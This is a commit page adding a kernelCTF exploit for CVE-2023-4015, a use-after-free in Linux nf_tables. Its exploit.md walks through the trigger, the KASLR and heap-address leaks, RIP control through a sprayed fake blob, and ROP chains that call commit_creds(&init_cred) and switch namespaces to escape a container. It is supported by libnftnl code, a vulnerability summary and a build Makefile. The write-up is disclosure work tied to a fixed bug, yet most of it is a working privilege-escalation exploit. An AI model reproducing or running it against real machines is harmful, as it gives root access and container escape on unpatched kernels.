Add kernelCTF CVE-2023-4015_lts (#101)
* Add kernelCTF CVE-2023-4015_lts

* update exploit.md and exploit.c
kevinrich1337 authored Jun 21, 2024
1 parent 63b6cb1 commit 9417433
Showing 8 changed files with 1,500 additions and 0 deletions.
322 changes: 322 additions & 0 deletions pocs/linux/kernelctf/CVE-2023-4015_lts/docs/exploit.md
### Triggering Vulnerability

If an error occurs while creating a new rule in `nf_tables_newrule()`, `nft_rule_expr_deactivate()` is called with `NFT_TRANS_PREPARE_ERROR` as an argument [1].

```c
static int nf_tables_newrule(struct sk_buff *skb, const struct nfnl_info *info,
			     const struct nlattr * const nla[])
{
	...

	return 0;

err_destroy_flow_rule:
	if (flow)
		nft_flow_rule_destroy(flow);
err_release_rule:
	nft_rule_expr_deactivate(&ctx, rule, NFT_TRANS_PREPARE_ERROR); // [1]
	nf_tables_rule_destroy(&ctx, rule);
err_release_expr:
	for (i = 0; i < n; i++) {
		if (expr_info[i].ops) {
			module_put(expr_info[i].ops->type->owner);
			if (expr_info[i].ops->type->release_ops)
				expr_info[i].ops->type->release_ops(expr_info[i].ops);
		}
	}
	kvfree(expr_info);

	return err;
}
```
If an immediate expr exists in the rule being created, `nft_immediate_deactivate()` is called. In the `NFT_TRANS_PREPARE_ERROR` phase, `nft_immediate_deactivate()` calls `nft_rule_expr_deactivate()` to deactivate the rules in the bound chain [2] and calls `nf_tables_unbind_chain()` to unbind the chain [3].
```c
static void nft_immediate_deactivate(const struct nft_ctx *ctx,
				     const struct nft_expr *expr,
				     enum nft_trans_phase phase)
{
	const struct nft_immediate_expr *priv = nft_expr_priv(expr);
	const struct nft_data *data = &priv->data;
	struct nft_ctx chain_ctx;
	struct nft_chain *chain;
	struct nft_rule *rule;

	if (priv->dreg == NFT_REG_VERDICT) {
		switch (data->verdict.code) {
		case NFT_JUMP:
		case NFT_GOTO:
			chain = data->verdict.chain;
			if (!nft_chain_binding(chain))
				break;

			chain_ctx = *ctx;
			chain_ctx.chain = chain;

			list_for_each_entry(rule, &chain->rules, list)
				nft_rule_expr_deactivate(&chain_ctx, rule, phase); // [2]

			switch (phase) {
			case NFT_TRANS_PREPARE_ERROR:
				nf_tables_unbind_chain(ctx, chain); // [3]
				fallthrough;
			case NFT_TRANS_PREPARE:
				nft_deactivate_next(ctx->net, chain);
				break;
			default:
				nft_chain_del(chain);
				chain->bound = false;
				chain->table->use--;
				break;
			}
			break;
		default:
			break;
		}
	}

	if (phase == NFT_TRANS_COMMIT)
		return;

	return nft_data_release(&priv->data, nft_dreg_to_type(priv->dreg));
}
```

Afterwards, on the abort path (`__nf_tables_abort()`), the previously queued `NFT_MSG_NEWRULE` transaction is processed. Because the rule was unbound at [3], the condition at [4] is not satisfied, so `nft_rule_expr_deactivate()` is called again at [5]. Since the deactivation was already performed at [2], `nft_immediate_deactivate()` runs twice for the same rule (once in the `NFT_TRANS_PREPARE_ERROR` phase and once in the `NFT_TRANS_ABORT` phase), which underflows `chain->use` in `nft_data_release()`.

```c
static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
{
	...
		case NFT_MSG_NEWRULE:
			if (nft_trans_rule_bound(trans)) { // [4]
				nft_trans_destroy(trans);
				break;
			}
			trans->ctx.chain->use--;
			list_del_rcu(&nft_trans_rule(trans)->list);
			nft_rule_expr_deactivate(&trans->ctx, // [5]
						 nft_trans_rule(trans),
						 NFT_TRANS_ABORT);
			if (trans->ctx.chain->flags & NFT_CHAIN_HW_OFFLOAD)
				nft_flow_rule_destroy(nft_trans_flow_rule(trans));
			break;
```
We can trigger the vulnerability as follows (a hedged libnftnl sketch of rule `R1` follows the list):
- Create three chains, `Base`, `Vulnerable`, and `Victim`. Set the `NFT_CHAIN_BINDING` flag on `Vulnerable`.
- Create a rule `R2` in `Vulnerable` with an immediate expr referencing `Victim`.
- Create a rule `R1` in `Base` with two immediate exprs referencing `Vulnerable`. Rule creation fails because the second immediate expr tries to bind a chain that is already bound, which takes the error path described above. As a result, `Victim` ends up with a reference count of -1.
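
For reference, a minimal libnftnl sketch of building `R1` (a hedged illustration, not the exploit's exact code; the table/chain names `"testtable"`, `"base"`, and `"vulnerable"` are placeholders, and the surrounding netlink batch handling is omitted):

```c
#include <linux/netfilter.h>
#include <linux/netfilter/nf_tables.h>
#include <libnftnl/rule.h>
#include <libnftnl/expr.h>

/* Build rule R1: two immediate exprs, both jumping to the bound chain
 * "vulnerable". The second bind attempt fails because the chain is already
 * bound, so nf_tables_newrule() takes the NFT_TRANS_PREPARE_ERROR path. */
static struct nftnl_rule *build_trigger_rule(void)
{
	struct nftnl_rule *r = nftnl_rule_alloc();

	nftnl_rule_set_u32(r, NFTNL_RULE_FAMILY, NFPROTO_IPV4);
	nftnl_rule_set_str(r, NFTNL_RULE_TABLE, "testtable");
	nftnl_rule_set_str(r, NFTNL_RULE_CHAIN, "base");

	for (int i = 0; i < 2; i++) {
		struct nftnl_expr *imm = nftnl_expr_alloc("immediate");

		nftnl_expr_set_u32(imm, NFTNL_EXPR_IMM_DREG, NFT_REG_VERDICT);
		nftnl_expr_set_u32(imm, NFTNL_EXPR_IMM_VERDICT, NFT_JUMP);
		nftnl_expr_set_str(imm, NFTNL_EXPR_IMM_CHAIN, "vulnerable");
		nftnl_rule_add_expr(r, imm);
	}

	return r;
}
```
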
### KASLR Bypass
The kernel base address is leaked through `chain->name`, which is reachable via the verdict data of an immediate expr (`nft_immediate_expr.data.verdict`). The leak works as follows:
- Create three chains, `Base`, `Vulnerable`, and `Victim`. Set the `NFT_CHAIN_BINDING` flag on `Vulnerable`. Make `Victim`'s name 9-16 bytes long so that it is allocated from `kmalloc-cg-16`.
- Create a rule in `Base` with an immediate expr referencing `Vulnerable`.
- Create a rule in `Vulnerable` with an immediate expr referencing `Victim`.
- Trigger the vulnerability. This leaves `Victim` with a reference count of -1.
- Create an immediate expr in `Base` that references `Victim`, bringing `Victim`'s reference count from -1 back to 0, and then destroy `Victim`.
- Spray counter exprs (`struct nft_expr`) so that one lands at the freed `Victim`'s `chain->name`. A counter expr (`struct nft_expr`) is 16 bytes, so the sprayed objects are also allocated from `kmalloc-cg-16`.
- Dump the immediate expr of `Base` with the `GETRULE` command. Through the freed `chain->name` we read the ops pointer of a counter expr [6] and derive the kernel base address from it (a parsing sketch follows the code below).
```c
int nft_verdict_dump(struct sk_buff *skb, int type, const struct nft_verdict *v)
{
	struct nlattr *nest;

	nest = nla_nest_start_noflag(skb, type);
	if (!nest)
		goto nla_put_failure;

	if (nla_put_be32(skb, NFTA_VERDICT_CODE, htonl(v->code)))
		goto nla_put_failure;

	switch (v->code) {
	case NFT_JUMP:
	case NFT_GOTO:
		if (nla_put_string(skb, NFTA_VERDICT_CHAIN,
				   v->chain->name)) // [6]
			goto nla_put_failure;
	}

	nla_nest_end(skb, nest);
	return 0;

nla_put_failure:
	return -1;
}
```
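
A hedged sketch of the parsing step; `leaked_name` and `nft_counter_ops_off` are placeholders for the dumped `NFTA_VERDICT_CHAIN` bytes and the per-build offset of `nft_counter_ops`, not names from the original exploit:

```c
#include <stdint.h>
#include <string.h>

/* The freed chain->name now aliases a sprayed counter expr (struct nft_expr),
 * whose first 8 bytes are the pointer &nft_counter_ops. */
static uint64_t kbase_from_leak(const unsigned char *leaked_name,
				uint64_t nft_counter_ops_off)
{
	uint64_t leaked_ops;

	memcpy(&leaked_ops, leaked_name, sizeof(leaked_ops));
	return leaked_ops - nft_counter_ops_off; /* kernel base */
}
```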

### Heap Address Leak

We leak the heap address in the same way as the kernel base address, except that we spray `nft_rule` objects instead of counter exprs. We place an `nft_rule` at the freed `Victim`'s `nft_chain->name` and dump the rules of `Base`. As a result, we can read the heap addresses stored in `nft_rule->list` through `Victim`'s `nft_chain->name`. By creating the `nft_rule`s appropriately, we put the address of a `kmalloc-cg-96` object in `list->next` and the address of a `kmalloc-cg-192` object in `list->prev`. The size of an `nft_rule` can be adjusted by adding multiple `nft_expr`s inside it. Since the leak goes through a string-typed attribute, we repeat the entire exploit until the heap addresses contain no null bytes.
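
A hedged parsing sketch; again, `leaked_name` stands for the dumped chain name, which now overlaps a sprayed `struct nft_rule` whose first field is its `struct list_head`:

```c
#include <stdint.h>
#include <string.h>

/* The first 16 bytes of the freed name overlap nft_rule->list. */
static void heap_from_leak(const unsigned char *leaked_name,
			   uint64_t *heap_addr1, uint64_t *heap_addr2)
{
	memcpy(heap_addr1, leaked_name, 8);     /* list.next: kmalloc-cg-96 object  */
	memcpy(heap_addr2, leaked_name + 8, 8); /* list.prev: kmalloc-cg-192 object */
}
```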

### RIP Control

We use `nft_chain->blob_gen_0` to control RIP. `nft_chain->blob_gen_0` is dereferenced when packets are evaluated in `nft_do_chain()` [7].

```c
unsigned int
nft_do_chain(struct nft_pktinfo *pkt, void *priv)
{
	...
do_chain:
	if (genbit)
		blob = rcu_dereference(chain->blob_gen_1);
	else
		blob = rcu_dereference(chain->blob_gen_0); // [7]

	rule = (struct nft_rule_dp *)blob->data;
	last_rule = (void *)blob->data + blob->size;
next_rule:
	regs.verdict.code = NFT_CONTINUE;
	for (; rule < last_rule; rule = nft_rule_next(rule)) {
		nft_rule_dp_for_each_expr(expr, last, rule) {
			if (expr->ops == &nft_cmp_fast_ops)
				nft_cmp_fast_eval(expr, &regs);
			else if (expr->ops == &nft_cmp16_fast_ops)
				nft_cmp16_fast_eval(expr, &regs);
			else if (expr->ops == &nft_bitwise_fast_ops)
				nft_bitwise_fast_eval(expr, &regs);
			else if (expr->ops != &nft_payload_fast_ops ||
				 !nft_payload_fast_eval(expr, &regs, pkt))
				expr_call_ops_eval(expr, &regs, pkt);

			if (regs.verdict.code != NFT_CONTINUE)
				break;
		}
	...
```
To do this, we get `chain->blob_gen_0` placed in `kmalloc-cg-64` and trigger the vulnerability. `chain->blob_gen_0` is allocated by `nf_tables_chain_alloc_rules()` when a new chain is created [8].
```c
static int nf_tables_addchain(struct nft_ctx *ctx, u8 family, u8 genmask,
			      u8 policy, u32 flags,
			      struct netlink_ext_ack *extack)
{
	...
	data_size = offsetof(struct nft_rule_dp, data); /* last rule */
	blob = nf_tables_chain_alloc_rules(data_size); // [8]
	if (!blob) {
		err = -ENOMEM;
		goto err_destroy_chain;
	}
```

The size passed to `kvmalloc()` [9] is 40 bytes: `offsetof(struct nft_rule_dp, data)` + `sizeof(struct nft_rule_blob)` + `sizeof(struct nft_rules_old)` (8 + 8 + 24), so the `blob` object is allocated from `kmalloc-cg-64`.

```c
static struct nft_rule_blob *nf_tables_chain_alloc_rules(unsigned int size)
{
	struct nft_rule_blob *blob;

	/* size must include room for the last rule */
	if (size < offsetof(struct nft_rule_dp, data))
		return NULL;

	size += sizeof(struct nft_rule_blob) + sizeof(struct nft_rules_old);
	if (size > INT_MAX)
		return NULL;

	blob = kvmalloc(size, GFP_KERNEL_ACCOUNT); // [9]
	if (!blob)
		return NULL;

	blob->size = 0;
	nft_last_rule(blob, blob->data);

	return blob;
}
```
We then spray the `udata` of `struct nft_table` so that one copy lands in the freed `blob_gen_0` (a hedged spray sketch follows `expr_call_ops_eval()` below). Finally, when a packet is sent, the sprayed fake ops pointer is dereferenced, resulting in RIP control [10].
```c
static void expr_call_ops_eval(const struct nft_expr *expr,
			       struct nft_regs *regs,
			       struct nft_pktinfo *pkt)
{
#ifdef CONFIG_RETPOLINE
	unsigned long e = (unsigned long)expr->ops->eval;
#define X(e, fun) \
	do { if ((e) == (unsigned long)(fun)) \
		return fun(expr, regs, pkt); } while (0) // [10]

	X(e, nft_payload_eval);
	X(e, nft_cmp_eval);
	X(e, nft_counter_eval);
	X(e, nft_meta_get_eval);
	X(e, nft_lookup_eval);
	X(e, nft_range_eval);
	X(e, nft_immediate_eval);
	X(e, nft_byteorder_eval);
	X(e, nft_dynset_eval);
	X(e, nft_rt_get_eval);
	X(e, nft_bitwise_eval);
#undef X
#endif /* CONFIG_RETPOLINE */
	expr->ops->eval(expr, regs, pkt);
}
```
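
A hedged sketch of the `udata` spray. It assumes libnftnl's `NFTNL_TABLE_USERDATA` attribute, and `fake_blob` is a placeholder for a prepared buffer laid out as a fake `nft_rule_blob` holding one fake rule whose single fake `nft_expr` carries the attacker-controlled `ops` pointer (pointing into the leaked heap objects):

```c
#include <stdio.h>
#include <stdint.h>
#include <linux/netfilter.h>
#include <libnftnl/table.h>

/* The kernel copies table userdata into its own kmalloc-cg-* allocation
 * sized by its length, so a 33-64 byte udata lands in kmalloc-cg-64, the
 * same cache as the freed chain->blob_gen_0. */
static struct nftnl_table *spray_table_udata(const void *fake_blob,
					     uint32_t len, int idx)
{
	char name[32];
	struct nftnl_table *t = nftnl_table_alloc();

	snprintf(name, sizeof(name), "spray_%d", idx);
	nftnl_table_set_u32(t, NFTNL_TABLE_FAMILY, NFPROTO_IPV4);
	nftnl_table_set_str(t, NFTNL_TABLE_NAME, name);
	nftnl_table_set_data(t, NFTNL_TABLE_USERDATA, fake_blob, len);

	/* ... serialize with nftnl_table_nlmsg_build_payload() and send as an
	 * NFT_MSG_NEWTABLE request in the netlink batch ... */
	return t;
}
```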

### Post RIP

We store the ROP payloads below at the `kmalloc-cg-96` and `kmalloc-cg-192` addresses leaked above and then execute them. The payload for `kmalloc-cg-192` is written into `nft_rule->data` when the rule is created during the heap spray. The payload for `kmalloc-cg-96` is placed by spraying `nft_table->udata` after freeing the rule used in the heap spray.

```c
void make_payload(uint64_t *data)
{
	int i = 0;

	data[i++] = kbase + push_rbx_pop_rsp;

	// commit_creds(&init_cred)
	data[i++] = kbase + pop_rdi_ret;
	data[i++] = kbase + init_cred_off;
	data[i++] = kbase + commit_creds_off;

	// current = find_task_by_vpid(getpid())
	data[i++] = kbase + pop_rdi_ret;
	data[i++] = getpid();
	data[i++] = kbase + find_task_by_vpid_off;

	// current += offsetof(struct task_struct, rcu_read_lock_nesting)
	data[i++] = kbase + pop_rsi_ret;
	data[i++] = 0x474;
	data[i++] = kbase + add_rax_rsi_ret;

	// pivot the stack to the second payload sprayed at the kmalloc-cg-96 address
	data[i++] = kbase + pop_rsp_ret;
	data[i++] = heap_addr1 + 0x20;
}

void make_payload2(uint64_t *data)
{
	int i = 0;

	// overwrite current->rcu_read_lock_nesting (bypass the RCU-protected section)
	data[i++] = kbase + pop_rcx_ret;
	data[i++] = -0xffff;
	data[i++] = kbase + mov_rax_rcx_ret;

	// find_task_by_vpid(1)
	data[i++] = kbase + pop_rdi_ret;
	data[i++] = 1;
	data[i++] = kbase + find_task_by_vpid_off;

	// switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy)
	data[i++] = kbase + mov_rdi_rax_ret;
	data[i++] = kbase + pop_rsi_ret;
	data[i++] = kbase + init_nsproxy_off;
	data[i++] = kbase + switch_task_namespaces_off;

	// return to userspace via the KPTI trampoline
	data[i++] = kbase + swapgs_restore_regs_and_return_to_usermode_off;
	data[i++] = 0;            // rax
	data[i++] = 0;            // rdx
	data[i++] = _user_rip;    // user_rip
	data[i++] = _user_cs;     // user_cs
	data[i++] = _user_rflags; // user_rflags
	data[i++] = _user_sp;     // user_sp
	data[i++] = _user_ss;     // user_ss
}
```
12 changes: 12 additions & 0 deletions pocs/linux/kernelctf/CVE-2023-4015_lts/docs/vulnerability.md
- Requirements:
    - Capabilities: CAP_NET_ADMIN
    - Kernel configuration: CONFIG_NETFILTER=y, CONFIG_NF_TABLES=y
    - User namespaces required: Yes
- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=4bedf9eee016
- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0a771f7b266b02d262900c75f1e175c7fe76fec2
- Affected Version: v6.4 - v6.5-rc2
- Affected Component: net/netfilter
- Syscall to disable: disallow unprivileged user namespaces
- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-4015
- Cause: Use-After-Free
- Description: A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation. On an error while building an nftables rule, deactivating immediate expressions in nft_immediate_deactivate() can unbind the chain, leaving objects deactivated but later used. We recommend upgrading past commit 0a771f7b266b02d262900c75f1e175c7fe76fec2.
39 changes: 39 additions & 0 deletions pocs/linux/kernelctf/CVE-2023-4015_lts/exploit/lts-6.1.36/Makefile
LIBMNL_DIR = $(realpath ./)/libmnl_build
LIBNFTNL_DIR = $(realpath ./)/libnftnl_build

LIBS = -L$(LIBNFTNL_DIR)/install/lib -L$(LIBMNL_DIR)/install/lib -lnftnl -lmnl
INCLUDES = -I$(LIBNFTNL_DIR)/libnftnl-1.2.5/include -I$(LIBMNL_DIR)/libmnl-1.0.5/include
CFLAGS = -static -s

exploit:
	gcc -o exploit exploit.c $(LIBS) $(INCLUDES) $(CFLAGS)

prerequisites: libnftnl-build

libmnl-build : libmnl-download
	tar -C $(LIBMNL_DIR) -xvf $(LIBMNL_DIR)/libmnl-1.0.5.tar.bz2
	cd $(LIBMNL_DIR)/libmnl-1.0.5 && ./configure --enable-static --prefix=`realpath ../install`
	cd $(LIBMNL_DIR)/libmnl-1.0.5 && make -j`nproc`
	cd $(LIBMNL_DIR)/libmnl-1.0.5 && make install

libnftnl-build : libmnl-build libnftnl-download
	tar -C $(LIBNFTNL_DIR) -xvf $(LIBNFTNL_DIR)/libnftnl-1.2.5.tar.xz
	cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && PKG_CONFIG_PATH=$(LIBMNL_DIR)/install/lib/pkgconfig ./configure --enable-static --prefix=`realpath ../install`
	cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && C_INCLUDE_PATH=$(C_INCLUDE_PATH):$(LIBMNL_DIR)/install/include LD_LIBRARY_PATH=$(LD_LIBRARY_PATH):$(LIBMNL_DIR)/install/lib make -j`nproc`
	cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && make install

libmnl-download :
	mkdir $(LIBMNL_DIR)
	wget -P $(LIBMNL_DIR) https://netfilter.org/projects/libmnl/files/libmnl-1.0.5.tar.bz2

libnftnl-download :
	mkdir $(LIBNFTNL_DIR)
	wget -P $(LIBNFTNL_DIR) https://netfilter.org/projects/libnftnl/files/libnftnl-1.2.5.tar.xz

run:
	./exploit

clean:
	rm -f exploit
	rm -rf $(LIBMNL_DIR)
	rm -rf $(LIBNFTNL_DIR)